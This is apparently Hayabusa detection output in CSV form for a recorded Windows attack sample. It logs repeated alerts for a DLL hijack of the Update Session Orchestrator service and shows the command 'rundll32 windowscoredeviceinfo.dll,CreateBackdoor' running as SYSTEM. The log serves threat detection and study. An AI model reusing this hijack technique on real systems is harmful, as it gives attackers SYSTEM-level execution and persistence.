+2020-03-21 14:00:19.877 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbgcore.dll | Process: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1090_none_5715d73398f9ea47\TiWorker.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6420 | PGUID: 747F3D96-9F63-5E75-0000-0010BCD01F00 | Hash: SHA1=E3FA87C983008D4D2A5D31708415F88548FC7702,MD5=88E88D8C1C663769BDD722000A7EB5A7,SHA256=C84BECA73EA45D3C53D9C42CD6A37CC0CC07FF57D9CFEE113CDF70F640572AEF,IMPHASH=9D75F08EA29885182B136CE4FF854114",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.187 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 3300 | PGUID: 747F3D96-9F68-5E75-0000-001079652000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.192 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7420 | PGUID: 747F3D96-9F68-5E75-0000-0010B9662000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.205 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3300 | PGUID: 747F3D96-9F68-5E75-0000-001079652000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.209 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7420 | PGUID: 00000000-0000-0000-0000-000000000000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.213 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 2536 | PGUID: 747F3D96-9F69-5E75-0000-00106F6A2000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.218 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 1828 | PGUID: 747F3D96-9F69-5E75-0000-0010946B2000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.224 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2536 | PGUID: 747F3D96-9F69-5E75-0000-00106F6A2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.230 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1828 | PGUID: 747F3D96-9F69-5E75-0000-0010946B2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.232 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7836 | PGUID: 747F3D96-9F69-5E75-0000-0010476F2000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.242 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7836 | PGUID: 747F3D96-9F69-5E75-0000-0010476F2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.247 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6400 | PGUID: 747F3D96-9F69-5E75-0000-0010DE732000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.255 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6400 | PGUID: 747F3D96-9F69-5E75-0000-0010DE732000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.388 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8160 | PGUID: 747F3D96-9F69-5E75-0000-001055912000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.401 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6572 | PGUID: 747F3D96-9F69-5E75-0000-001033922000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.425 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8160 | PGUID: 747F3D96-9F69-5E75-0000-001055912000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.434 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6572 | PGUID: 747F3D96-9F69-5E75-0000-001033922000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.440 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6136 | PGUID: 747F3D96-9F69-5E75-0000-00102F962000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.451 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 1388 | PGUID: 747F3D96-9F69-5E75-0000-001035972000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.463 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6136 | PGUID: 747F3D96-9F69-5E75-0000-00102F962000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.485 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1388 | PGUID: 747F3D96-9F69-5E75-0000-001035972000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.486 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 2028 | PGUID: 747F3D96-9F69-5E75-0000-00105B9A2000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.513 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2028 | PGUID: 747F3D96-9F69-5E75-0000-00105B9A2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.542 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 3536 | PGUID: 747F3D96-9F69-5E75-0000-0010729F2000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
